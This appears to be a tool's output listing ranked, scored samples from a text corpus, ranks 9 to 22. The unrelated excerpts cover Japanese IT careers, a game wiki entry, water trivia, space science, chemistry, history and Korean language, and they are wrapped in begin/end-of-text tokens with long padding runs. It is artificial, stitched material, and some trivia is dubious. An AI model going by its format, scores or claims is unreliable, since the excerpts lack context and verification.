industry, and the exodus is one of the main reasons why Japan is losing its competitiveness in the new digital age [6]. + +A personal perspective + +37-year-old software architect Ryo Asai [7] (@ryoasai74 [8]) and his blog “Becoming a Master Programmer [9]” (達人プログラマーを目指して) [jp] offer a rare counterpoint to this gloomy picture, and a unique window onto the state of the IT industry in Japan. In his profile, the blogger explains: + +世間ではプログラマーは忙しいわりに報酬の少ない報われない職業という意見もあるようですが、インターネットで気軽に情報を発信したり、オープンソースの コミュニティに参加して一緒に開発したり、プログラマーが活躍できる場所は以前と比べてずっと広がっているということに最近ようやく気づきました。勉強の 材料もインターネットからほとんど無料で手に入る時代ですし、やはりプログラミングが好きな人間にとっては本当に魅力的な仕事であると思います。IT業界 の現在や未来には悲観的な意見が多く、特にプログラマーに対しては魅力的な職業でないと +================================================================================ +Rank = 9; Score = 3244032.0 +<|begin_of_text|>Prime universe + +(Capcom's primary storyline) + +Duvalia jp name デュバリア Biological information Based: Majini Development information Date of + +creation: 2009 Created via: Type 3 Plagas Purpose: Experimental + +Duvalia is a stage in the life of the Type 3 Plaga, a genetically modified species of Plaga engineered by Tricell. Its name is derived from the Duvalia, a species of carrion flower found in tropical Africa. Its most recognizable feature is a large bulb found inside five shorter appendages, which the Plaga mimics with its armored shell and vulnerable core.[1][excerpt 1] + +History + +The Type 3 Plagas were being experimented on in humans from Summer 2008, with research taking place on the Ndipaya tribesmen who became known as Marshland Majini. By 2009 the guards working on Excella Gionne's cargo ship were also implanted with this Plaga type. + +Overall, Duvalia are more commonly seen in Base Majini. + +Bibliography + +Sources + +excerpts + +↑ Excerpt from kaitaishinsho, p.254: + +"デュバリアの名は多肉植物の属名から取られたものだが、 異称となるキャリオンフラワー、 つまり腐肉花という名にもふさわしい異形の姿であると言えるだろう。" + +references<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 10; Score = 3096576.0 +<|begin_of_text|>1 Water is everywhere—there are 332,500,000 cubic miles of it on the earth’s surface. But less than 1 percent of it is fresh and accessible, even when you include bottled water. + +2 And “fresh” can be a relative term. Before 2009, federal regulators did not require water bottlers to remove E. coli. + +3 Actually, E. coli doesn’t sound so bad. In 1999 the Natural Resources Defense Council found that one brand of spring water came from a well in an industrial parking lot near a hazardous waste dump. + +4 Cheers! The new Water Recovery System on the International Space Station recycles 93 percent of astronauts’ perspiration and urine, turning it back into drinking water. + +5 Kurdish villages in northern Iraq are using a portable version of the NASA system to purify water from streams and rivers, courtesy of the relief group Concern for Kids. + +6 Ice is a lattice of tetra­hedrally bonded molecules that contain a lot of empty space. That’s why it floats. + +7 Even after ice melts, some of those tetrahedrons almost always remain, like tiny ice cubes 100 molecules wide. So every glass of water, no matter what its temperature, comes on the rocks. + +8 You can make your own water by mixing hydrogen and oxygen in a container and adding a spark. Unfortunately, that is the formula that helped destroy the Hindenburg. + +9 Scientists have a less explosive recipe for extracting energy from hydrogen and oxygen. Strip away electrons from some hydrogen molecules, add oxygen molecules with too many electrons, and bingo! You get an electric current. That’s what happens in a fuel cell. + +10 Good gardeners know not to water plants during the day. Droplets clinging to the leaves can act as little magnifying glasses, focusing sunlight and causing the plants to burn. + +11 Hair on your skin can hold water droplets too. A hairy leg may get sunburned more quickly than a shaved one. + +12 Vicious cycle: Water in the stratosphere contributes to the current warming of the earth’s atmosphere. That in turn may increase the severity of tropical cyclones, which throw more water into the stratosphere. That’s the theory, anyway. + +13 The slower rate of warming in the past decade might be due to a 10 percent drop in stratospheric water. Cause: unknown. + +14 Although many doctors tell patients to drink eight glasses of water a day, there is no scientific evidence to support this advice. + +15 The misinformation might have come from a +================================================================================ +Rank = 11; Score = 2752512.0 +<|begin_of_text|>Cassini Finishes Sleigh Ride by Icy Moons + +On the heels of a successful close flyby of Saturn's moon Enceladus, NASA's Cassini spacecraft is returning images of Enceladus and the nearby moon Dione. + +Several pictures show Enceladus backlit, with the dark outline of the moon crowned by glowing jets from the south polar region. The images show several separate jets, or sets of jets, emanating from the fissures known as "tiger stripes." Scientists will use the images to pinpoint the jet source locations on the surface and learn more about their shape and variability. + +The Enceladus flyby took Cassini within about 48 kilometers (30 miles) of the moon's northern hemisphere. Cassini's fields and particles instruments worked on searching for particles that may form a tenuous atmosphere around Enceladus. They also hope to learn whether those particles may be similar to the faint oxygen- and carbon-dioxide atmosphere detected recently around Rhea, another Saturnian moon. The scientists were particularly interested in the Enceladus environment away from the jets emanating from the south polar region. Scientists also hope this flyby will help them understand the rate of micrometeoroid bombardment in the Saturn system and get at the age of Saturn's main rings. + +This flyby of Enceladus, the 13th in Cassini's mission, took a similar path to the last Enceladus flyby on Nov. 30. About eight hours before the Enceladus flyby, Cassini also swung past Dione at a distance of about 100,000 kilometers (62,000 miles). During that flyby, the spacecraft snapped clear, intriguing images of the bright, fractured region known as the "wispy terrain." These features are tectonic ridges and faults formed by geologic activity on the moon sometime in the past. Scientists will now be able to measure the depth and extent of them more accurately. + +The Cassini-Huygens mission is a cooperative project of NASA, the European Space Agency and the Italian Space Agency. NASA's Jet Propulsion Laboratory, a division of the California Institute of Technology in Pasadena, manages the mission for NASA's Science Mission Directorate, Washington, D.C. + +For more information about the Cassini-Huygens mission, visit http://saturn.jpl.nasa.gov and http://www.nasa.gov/cassini. + +Media contact: + +Jia-Rui C. Cook 818-354-0850 +================================================================================ +Rank = 12; Score = 2686976.0 +<|begin_of_text|>By Andy May + +18O is a rare isotope of oxygen. The ratio of 18O to the normal 16O in foraminifera fossils (“forams”) can be used to estimate paleo-ocean temperatures. Higher values mean lower temperatures. A recent article on geologypage.com (here) led me to Bernard, et al., 2017, which has experimental data that suggest 18O concentrations can be altered in fossils by solid-state diffusion after fossilization. This can corrupt the measurement and the resulting calculated temperature. According to Bernard and colleagues, the 18O concentration alteration is visually imperceptible, so one cannot tell the fossil has been altered by visual inspection. If their results are valid, how will this impact our view of climate history? + +Fractionation of 18O and 16O takes place during evaporation and precipitation, so another problem for this paleothermometer is glacier and polar ice, which delay the return of excess 16O in water vapor to the ocean. Correlations of δ18O to temperature are for an ice-free Earth, the formation of polar ice caps and mountain glaciers have an additional effect on δ18O. In figure 1, the δ18O record and the δ13C record are shown for the Cenozoic (65 million years ago to the present day). + +Figure 1 (source: Zachos, et al., 2001) + +The red temperature scale at the bottom of figure 1 is only applicable when there is no significant permanent polar ice, Zachos, et al. call this the ice-free temperature. It is applicable prior to about 33 million years ago when Antarctica and the North Pole were ice-free, at least in their respective summer months. Once permanent ice caps appear, they remove 16O from the oceans indefinitely and lead to a large positive δ18O in the oceans and in forams. Both records shown in figure 1 are for global deep-sea pelagic fossils, water depths greater than 1,000 meters. + +In the experiments, Bernard, et al. exposed foraminifera tests (shells) to elevated pressures and temperatures when submersed in pure H 2 18O. The forams were then monitored with a micro-mass spectrometer and they observed oxygen-isotope changes. They then attempted to model the isotope diffusion process during sediment burial. Their models suggest that on a time scale of tens of millions of years, the isotopic diffusion could cause ice-free δ18 +================================================================================ +Rank = 13; Score = 2572288.0 +<|begin_of_text|>Perchloric acid is a mineral acid with the formula HClO 4. Usually found as an aqueous solution, this colorless compound is a stronger acid than sulfuric acid and nitric acid. It is a powerful oxidizer when hot, but aqueous solutions up to approximately 70% by weight at room temperature are generally safe, only showing strong acid features and no oxidizing properties. Perchloric acid is useful for preparing perchlorate salts, especially ammonium perchlorate, an important rocket fuel component. Perchloric acid is dangerously corrosive and readily forms potentially explosive mixtures. + +Production [ edit ] + +Perchloric acid is produced industrially by two routes. The traditional method exploits the high aqueous solubility of sodium perchlorate (209 g/100 mL of water at room temperature). Treatment of such solutions with hydrochloric acid gives perchloric acid, precipitating solid sodium chloride: + +NaClO 4 + HCl → NaCl + HClO 4 + +The concentrated acid can be purified by distillation. The alternative route, which is more direct and avoids salts, entails anodic oxidation of aqueous chlorine at a platinum electrode.[5][6] + +Laboratory preparations [ edit ] + +Treatment of barium perchlorate with sulfuric acid precipitates barium sulfate, leaving perchloric acid. It can also be made by mixing nitric acid with ammonium perchlorate and boiling while adding hydrochloric acid. The reaction gives nitrous oxide and perchloric acid due to a concurrent reaction involving the ammonium ion and can be concentrated and purified significantly by boiling off the remaining nitric and hydrochloric acids. + +Properties [ edit ] + +Anhydrous perchloric acid is an unstable oily liquid at room temperature. It forms at least five hydrates, several of which have been characterized crystallographically. These solids consist of the perchlorate anion linked via hydrogen bonds to H 2 O and H 3 O+ centers[7] Perchloric acid forms an azeotrope with water, consisting of about 72.5% perchloric acid. This form of the acid is stable indefinitely and is commercially available. Such solutions are hygroscopic. Thus, if left open to the air, concentrated perchloric acid dilutes itself by absorbing water from the air. + +Dehydration of perchloric acid gives the anhydride dichlorine heptoxide:[8] + +2 HClO 4 + P +================================================================================ +Rank = 14; Score = 2555904.0 +<|begin_of_text|>The Korean language contains many words that are based on onomatopoeia, which is the sound associated with an object or action. The Korean word for onomatopoeia is heeseongeo ( 의성어), but don't worry about remembering it... it's rarely used. In fact, if you use the word with Koreans, then they might assume that you are talking about some kind of fish! So let's take a closer look at a few of them. + +Note: This article contains Hangul (Korean letters). If you can't read Korean yet, download a free guide here to start reading in about 60 minutes!! 의성어), + +Learning the onomatopoeic Korean words might sound like an easy way to improve your Korean ability, but it's not as easy as it might seem. This is because the sounds that Koreans associate with something can be very different from the sounds that English speakers associate with the same object or action. + +Take animals, for instance. What sound does a dog make? In English, people might say "woof, woof" but in Korean, " 멍멍 (meong-meong)." Clearly these are very different. Cats, in English, go "meow, meow"; in Korean, " 야옹 (ya-ong)." Korean pigs sound, " 꿀꿀꿀 (ggul-ggul-ggul)" whereas in English, "oink-oink." Ducks in Korea go " 곽곽 (quack-quack)", and in English... well, actually that one happens to be the same. + +In some cases, the Korean name of certain animals is based on the sound that they make, which makes it easier for learners of Korean to remember the names of such animals. Frogs in Korean are called 개구리 (gaeguri) and the sound that they make is " 개굴개굴 (gaegul-gaegul)" while owls are called 부엉이 (bu-ong-i) and make a " 부엉부엉 (bu-ong-bu-ong)" sound when they hoot. 개구리개굴개굴부엉이부엉부엉 + +Other Animal Sounds + +(koo-koo) – the sound of a pigeon 구구 + +(ummeh) – the sound of a cow or sheep 음메 + +(chik-chik) – the sound of a mouse squeaking 찍찍 + +(hi-ing) +================================================================================ +Rank = 15; Score = 2457600.0 +<|begin_of_text|>The SnO 2 /GS Foam was fabricated by a chemical self-assembly strategy and a subsequent freeze-drying process (Fig. 1). At step 1, from the collochemistry, the metal oxide such as Fe 2 O 3, TiO 2 and SnO 2 colloid was positively charged; the GO was negatively charged because GO has many oxygen containing functional groups on the surface35. The GO and SnO 2 nanoparticles were attracted by the electrostatic force so that the SnO 2 nanoparticles can distribute on the surface of GO and not departure by the ultrasonication and stir. At step 2, L-ascorbyl acid was used to reduce oxygen containing functional groups (e.g. carboxyl) on the surface GO, producing in situ reduced GO (rGO). rGO has smaller solubility in water than GO because the reduction of polar oxygen containing functional groups makes GO less hydrophilic. So, as GO sheet began to turn into the rGO, the delocalized π-bond’s conjugative effect would be increased and enlarged. The freshly formed rGO sheets would stack on other rGO sheets as a result of the π–π stacking interactions and self-assembled into a 3D structure. After the chemical reaction and at step 3, there are still many oxygen containing functional groups left on rGO sheets, thus, the SnO 2 nanoparticles with polar surfaces would interact with those functional groups via hydrogen bonding. By annealing at 550 °C, the hydrogen bonds may turn into oxygen bridges between SnO 2 and rGO, forming Sn-O-C bonds. Therefore, the SnO 2 nanoparticles are anchored strongly on the graphene surface through a C-O-Sn bridge, which facilitates the electron transfer and improve the electrode stability. Finally, we obtain a porous ASGF with relative density of ~19 mg cm−3. + +Figure 1: Schematic Illustration of Preparation of ASGF. Full size image + +The morphologies of the as-prepared ASGF were investigated by SEM and TEM. Typical SEM images in Fig. 2A,B show that ASGF possess a 3D structure with interconnected pores ranging from several nanometers to several micrometers. Moreover, the energy dispersive X-ray spectroscopy (EDX) measurement of the ASGF reveals that presence of Sn, O, and C. (Fig. 2E). The TEM images (Fig. 2C,D) show that the SnO +================================================================================ +Rank = 16; Score = 2441216.0 +<|begin_of_text|>One of the oldest questions on earth is how all this crazy life started. Where did you come from? How about your office plant, or your cat? For a long time, our only working idea was that gods from the heavens had provided the seed of life. We may, at least, have been looking into the correct direction: researchers at UC Berkeley recently added evidence to the idea that life on Earth came from a comet. + +The idea goes like this: the so-called “building blocks of life” on this planet are called dipeptides. And the real mystery is where these dipeptides came from. The Berkeley scientists’ research suggests that dipeptides could have formed on interplanetary dust and been carried down to earth on a comet. Berkeley writes: + +Chemists from the University of California, Berkeley, and the University of Hawaii, Manoa, showed that conditions in space are capable of creating complex dipeptides – linked pairs of amino acids – that are essential building blocks shared by all living things. The discovery opens the door to the possibility that these molecules were brought to Earth aboard a comet or possibly meteorites, catalyzing the formation of proteins (polypeptides), enzymes and even more complex molecules, such as sugars, that are necessary for life. + +Or, in the paper itself, the authors put it this way: + +Our results indicate that the radiation-induced, non-enzymatic formation of proteinogenic dipeptides in interstellar ice analogs is facile. Once synthesized and incorporated into the ”building material” of solar systems, biomolecules at least as complex as dipeptides could have been delivered to habitable planets such as early Earth by meteorites and comets, thus seeding the beginning of life as we know it. + +They figured this out by making a mini-comet in the lab. Combining carbon dioxide, ammonia and other chemicals like methane at super cold temperatures (space is pretty cold), they created a tiny comet-like thing. Then they added the lab equivalent of cosmic rays, zapping the mini-comet with electrons. What they saw was that the combination of these high energy electrons and the comet they had built created organic molecules like amino acids and dipeptides. + +The idea is that this reaction happened on its own in space, and those dipeptides were carried down to earth on that icy comet. In other words, the necessary blocks of life might really have descended to Earth from the sky. + +More from Smithsonian.com: + +The Origins of Life<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 17; Score = 2342912.0 +<|begin_of_text|>As we know from our history books, the War for Independence began with the shots fired at Lexington and Concord. Those shots required gunpowder, a substance that was in short supply throughout the colonies. In 1775 there was only one American gunpowder mill, the Frankford Mill in Pennsylvania, and it was turning out a miniscule amount compared to what would be needed to wage a successful war.[1] In addition, this mill was not turning out the high-quality powder needed for artillery use. If the Patriots were going to have any chance of victory, the colonies needed to step up production or import it. Had it not been for the French assistance in supplying the Americans with gunpowder from 1776 throughout the war, American forces would not have been able to fight and win the battles that they did. + +Gunpowder is a mixture of sulfur, charcoal, and potassium nitrate that must be combined in specific ratios. While this sounds simple enough, it must be remembered that in 1775 the state of chemistry was rudimentary. Potassium nitrate itself is a compound of nitrogen and potassium, neither element of which had been identified at that point in time.[2] What they did know was that what they called “nitre” was needed, which, in some recipes, involved soaking soil in urine from both animals and humans, and then allowing it to dry. The dried urine-soil was then boiled to produce saltpeter. Not all recipes agreed with this method which added to the problems in making gunpowder. Unfortunately this required half a year or more to produce nitre-bearing soil and created a bottleneck in the production of gunpowder in America. + +When the War for Independence started American supplies of powder were what they had gathered from Royal sources or their own local supplies. The amount was not enough to sustain an army in the field. While Congress was hopeful that they could establish enough mills to create their own self-sustaining sources of gunpowder, they also decided to seek additional supplies from overseas which meant European suppliers. The Journals of the Continental Congress are full of references to purchasing gunpowder in the West Indies. To do so meant selling American goods which involved adjusting the rules under the Association agreement of 1774. As several congressional delegates noted, gunpowder was needed or else the whole enterprise was lost. A Secret Committee was set up on September 19, 1775 to contract and agree to importation of gunpowder not to exceed 500 tons.[3] +================================================================================ +Rank = 18; Score = 2211840.0 +<|begin_of_text|>Oxygen on a planet might be a sign of life, but in two peculiar white dwarf stars it could indicate a narrow escape from a violent death. Their oxygen content marks them as failed stellar bombs – the remnants of stars that almost went supernova. + +The new stars are among thousands of white dwarfs picked up by the Sloane Digital Sky Survey. Like all white dwarfs they are the dead, cooling cores left behind by mainstream stars, and are mainly made of helium. Usually the second most plentiful ingredient is carbon – but when a group of astronomers led by Boris Gänsicke at the University of Warwick, UK, analysed the spectrum of light from these two white dwarfs, they found that the objects hold far more oxygen than carbon. + +“It’s extreme – these things look very different from any white dwarfs we’ve seen before,” says team member Danny Steeghs. + +Creating so much oxygen requires a nuclear furnace fiercer than that needed for a carbon-rich mixture, so the stars that spawned these white dwarfs must have been hot and massive. Simulations suggest that they must have been almost too big to end their days gently – any larger, and they would have grown a core so massive and dense that it would inevitably have collapsed, releasing enough energy to blow the rest of the star apart in a supernova explosion. + +Advertisement + +The critical mass needed to create such a supernova is thought to be between 7 and 10 times that of the sun. These almost-bombs might help astrophysicists to pin down the threshold more precisely, and Gänsicke hopes to use the Very Large Telescope in Chile’s Atacama Desert to get a clearer spectrum and reveal their chemistry in more detail. “It will give the theoreticians something to work with,” he says. + +Journal reference: Science, DOI: 10.1126/science.1180228<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 19; Score = 2179072.0 +<|begin_of_text|>Some say the world will end in fire, some in ice. One more reason to hold with those who favor fire: USC scientists have found that rock and soil breakdown in glaciers generates more acidity and releases more carbon than other forms of natural weathering, according to a new study. + +Perhaps most interestingly, researchers say, it is the elevated oxidation of pyrite, popularly known as “fool’s gold,” in the glacial breakdown that produces increased acidity and leads to CO 2 escaping to the atmosphere from rivers and the oceans. + +“CO 2 has gone up and down repeatedly over time, and we don’t really know why. Our study suggests that this process may play a meaningful role,” said Joshua West, professor of earth sciences and environmental studies at the USC Dornsife College of Letters, Arts and Sciences and the study’s corresponding author. + +This means that, over very long earth cycles, nature is self-regulating against future runaway glaciation. + +Graduate researcher Mark Torres of USC Dornsife’s Department of Earth Sciences served as the study’s lead author, which published Monday in the Proceedings of the National Academy of Science. + +The fool’s gold standard + +As oxidized pyrite slowly makes its way from glaciated water to the ocean, it creates an increase in CO 2 in the atmosphere. + +We found glacial rivers are rich in dissolved sulfur, and when they’re rich in sulfur, we have found that this tends to be because of the weathering of pyrite or fool’s gold. Mark Torres + +“We found glacial rivers are rich in dissolved sulfur, and when they’re rich in sulfur, we have found that this tends to be because of the weathering of pyrite or fool’s gold,” Torres said. “When these kinds of rivers flow into the ocean, the sulfur causes the transfer of carbon that was previously stored in rocks and the ocean back into the atmosphere.” + +To measure the amount of carbon released by glacial weathering, Torres, West and the rest of the team analyzed a large database of 7,700 river glacier drainage samples. + +The database was made up of a variety of samples collected from all over the world: Argentina, Canada, Greenland, Nepal, Iceland and the United States, among others. Included in the database were earlier field samples that had been collected by West and study co-author Jens Hartmann of the University of Hamburg. + +The glacial river samples consistently demonstrated a lower alkalinity-to-carbon ratio than other river samples, which is indicative of pyrite weathering and carbon dioxide release +================================================================================ +Rank = 20; Score = 2162688.0 +<|begin_of_text|>By virtue of synthesizing a stable B 3 ring, a team of inorganic chemists has prepared the lightest aromatic species that is experimentally possible. In addition to helping researchers better understand chemical structure and bonding, the sandwich molecule the team made containing two B 3 rings connected by sodium ions could serve a practical purpose as the first of a family of precursor compounds for preparing semiconducting, superconducting, and magnetic materials. + +Thomas Kupfer, Holger Braunschweig, and Krzysztof Radacki of Julius Maximilian University Würzburg made the triboracyclopropenyl dianion by treating cyclohexyl-substituted dichloroaminoborane with sodium metal in dimethoxyethane solvent (Angew. Chem. Int. Ed. 2015, DOI: 10.1002/anie.201508670). The Würzburg team has shown through computational, spectroscopic, and electrochemical studies that the B 3 ring has an electronic structure consistent with classical aromatic carbon compounds such as the cyclopropenyl cation and benzene. + +The announcement “is certainly a great breakthrough and opens a new direction in boron chemistry,” comments Alexander I. Boldyrev of Utah State University, whose group has done much of the computational work on planar all-boron rings during the past 15 years. + +Aromaticity as defined by the Hückel Rule has typically been the domain of carbon compounds, with only a few noncarbon analogs made from elements heavier than carbon. Chemists have long predicted that planar boron rings from B 3 up to B 15 or greater might also be aromatic. Researchers have been hot on the trail of making the boron rings, but the rings are challenging to stabilize in isolable compounds. The greatest success has come in generating the molecules with laser beams and studying them in the gas phase.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 21; Score = 2088960.0 +<|begin_of_text|>Victoria123 Registered User + +Join Date: Feb 2015 Location: Toronto-Vancouver Posts: 1,222 Likes (Received): 2028 + +Shilla Dynasty Excavation and Restoration Project - 신라왕경 복원 정비사업 + +Pics below - Hwangryongsa Temple - 황룡사 - the golden dragon temple. Standing a whopping 9 floors from the ground this + +81m tall pagoda will be the largest of its kind in North East Asia. Not to mention, backed up by accurate historical evidence, and ancient materials. + +Pic above - Wulsung- 월성 + +Pic below - Dong-goong & Wolji - 동궁과 월지 currently known as Anapji (great tourist attracion) (안압지) + +Currently archaeologists are excavating the sites below : + +The construction for 월정교 (Wol Jung Gyo Bridge) is already underway + +pic below is the rendering for this romantic royal bridge + +Pic below - Bridge finishing up : Just need to construct the Moon-Ru (문루) which are the two majestic gates at each end of the bridge. + +All the architectural details applied to these buildings had enough historical evidence for the ministry to approve the restoration. Perhaps an equally significant fact is that all the historical structures will have excavated material in them which renders it an "actually historical building" rather than a theme park, like the one built in Buyeo. + +Along with all the other existing historical attractions, the revealing of Shilla's 1000 year majesty will advance Gyung-Ju city's world recognition, and reputation. By 2025 the South Korean government is collaborating with Gyeongsang Nam Do to restore the hidden treasures of Shilla Dynasty at GyungJu city/ Shilla Dynasty lasted for more than 1000 years which makes it one of the oldest not just in Korean but human history as well. When the Shilla Dynasty was at its greatest peak it had the, the 4th largest city in the world, and had enormous economic, and social influence in Asia. Records show that the people of Shilla traveled as far as Persia (modern day Iran). In fact a Shilla princess married a Persian prince which demonstrates the political influence the ancient kingdom had at the time.Pics below - Hwangryongsa Temple - 황룡사 - the golden dragon temple. Standing a whopping 9 floors from the ground this81m tall pagoda will be the largest of its kind in North East Asia. Not to mention, backed +================================================================================ +Rank = 22; Score = 1949696.0 +<|begin_of_text|>How many atoms are there in a kilogram of silicon? This number is Avogadro’s constant and working out its value is one of the more important tasks that materials scientists face. + +Today, a group of physicists reveal the answer. They say there are 6.02214084(18) × 10^23 atoms in a single crystal of silicon weighing about a kilogram. And they say they know this is right because they’ve counted them. Yep, counted them. + +Actually, they counted the number of atoms in a unit volume of silicon and measured the size of this volume. The number of times this fits into a lump of exactly 1 mole of near perfect single crystal sphere of silicon is Avogadro’s number. + +To have established this number to such accuracy is clearly an important piece of work but just how impressive is put in perspective by the monumental efforts of the international consortium behind it. + +The work began in 2004 when a Russian group created a sample of silicon flouride with a specific isotopic content at the Central Design Bureau of Machine Building in St. Petersburg. A team at the Institute of Chemistry of High-Purity Substances of the Russian Academy of Sciences in Nizhny-Novgorod then turned this into a polycrystal of silicon hydride which a group at the 